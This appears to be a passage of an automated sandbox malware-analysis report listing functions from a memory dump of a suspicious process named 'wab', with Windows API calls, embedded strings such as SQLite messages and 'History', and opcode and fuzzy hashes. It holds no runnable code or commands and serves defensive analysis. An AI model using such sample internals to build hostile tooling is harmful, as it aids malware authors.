                                                                                                                • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemset
                                                                                                                • String ID: gj
                                                                                                                • API String ID: 1297977491-4203073231
                                                                                                                • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                                                                                  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                                • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                                • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                • malloc.MSVCRT ref: 004174BD
                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2903831945-0
                                                                                                                • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 0040D453
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                                                • String ID:
                                                                                                                • API String ID: 4247780290-0
                                                                                                                • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                • memset.MSVCRT ref: 004450CD
                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                                  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1471605966-0
                                                                                                                • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • wcscpy.MSVCRT ref: 0044475F
                                                                                                                • wcscat.MSVCRT ref: 0044476E
                                                                                                                • wcscat.MSVCRT ref: 0044477F
                                                                                                                • wcscat.MSVCRT ref: 0044478E
                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                                                  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                • String ID: \StringFileInfo\
                                                                                                                • API String ID: 102104167-2245444037
                                                                                                                • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040F508 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$??3@
                                                                                                                • String ID: g4@
                                                                                                                • API String ID: 3314356048-2133833424
                                                                                                                • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memicmpwcslen
                                                                                                                • String ID: @@@@$History
                                                                                                                • API String ID: 1872909662-685208920
                                                                                                                • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004100FB
                                                                                                                • memset.MSVCRT ref: 00410112
                                                                                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                • _snwprintf.MSVCRT ref: 00410141
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                • String ID: </%s>
                                                                                                                • API String ID: 3400436232-259020660
                                                                                                                • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040D58D
                                                                                                                • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                • String ID: caption
                                                                                                                • API String ID: 1523050162-4135340389
                                                                                                                • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                • String ID: MS Sans Serif
                                                                                                                • API String ID: 210187428-168460110
                                                                                                                • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassName_wcsicmpmemset
                                                                                                                • String ID: edit
                                                                                                                • API String ID: 2747424523-2167791130
                                                                                                                • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                • API String ID: 3150196962-1506664499
                                                                                                                • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                                • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                                • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memcmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 3384217055-0
                                                                                                                • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$memcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 368790112-0
                                                                                                                • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                  • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                  • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                • String ID:
                                                                                                                • API String ID: 1889144086-0
                                                                                                                • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                • String ID:
                                                                                                                • API String ID: 1661045500-0
                                                                                                                • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                • memcpy.MSVCRT ref: 0042EC7A
                                                                                                                Strings
                                                                                                                • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemset
                                                                                                                • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                • API String ID: 1297977491-2063813899
                                                                                                                • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

